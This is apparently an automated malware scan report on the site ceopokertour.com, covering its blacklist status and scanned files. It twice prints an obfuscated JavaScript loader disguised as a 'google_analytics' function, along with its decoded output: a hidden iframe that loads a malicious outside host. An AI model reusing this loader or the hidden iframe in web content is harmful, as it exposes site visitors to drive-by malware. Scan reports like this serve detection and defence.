Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ceopokertour.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.ceopokertour.com/ | 200 OK Content-Length: 15269 Content-Type: text/html | clean |
http://www.ceopokertour.com/script.js | 404 Not Found Content-Length: 1139 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
function google_analytics(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,48,51,46,1,40,45,37,26,17,0,0,0,0,0,0,8,62,39,10,27,43,33,0,28,23,25,22,55,49,59,50,12,18,19,7,13,14,35,3,57,31,36,0,0,0,0,9,0,20,29,38,21,30,6,4,52,24,41,47,15,32,61,2,60,11,53,44,54,56,16,34,5,42,58);
for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(170^w&255);w>>=8; s-=2}else{s=6}}document.write(r)}}google_analytics("KUP2ikpMlEitiBp7@CsLeETZxK5LikP2PDHMqNHtgUPMxUPMgcH2WI_c@yiLWNsLoY_wDw5wo0p1TqsLIwuc@yitel6MlY_wUlHt8DpORW_MxRp2@Qj7xUP2ikpMlR_")
Decoded script: <iframe src="http://traffloads.in/in.cgi?2" width="1" height="1" style="display:none"></iframe>
Antivirus reports:
http://www.ceopokertour.com/test404page.js | 404 Not Found Content-Length: 1144 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
function google_analytics(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,48,51,46,1,40,45,37,26,17,0,0,0,0,0,0,8,62,39,10,27,43,33,0,28,23,25,22,55,49,59,50,12,18,19,7,13,14,35,3,57,31,36,0,0,0,0,9,0,20,29,38,21,30,6,4,52,24,41,47,15,32,61,2,60,11,53,44,54,56,16,34,5,42,58);
for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(170^w&255);w>>=8; s-=2}else{s=6}}document.write(r)}}google_analytics("KUP2ikpMlEitiBp7@CsLeETZxK5LikP2PDHMqNHtgUPMxUPMgcH2WI_c@yiLWNsLoY_wDw5wo0p1TqsLIwuc@yitel6MlY_wUlHt8DpORW_MxRp2@Qj7xUP2ikpMlR_")
Decoded script: <iframe src="http://traffloads.in/in.cgi?2" width="1" height="1" style="display:none"></iframe>
Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ceopokertour.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ceopokertour.com
Referer: http://www.google.com/search?q=ceopokertour.com
Result:
The result is similar to the first query. There are no suspicious redirects found.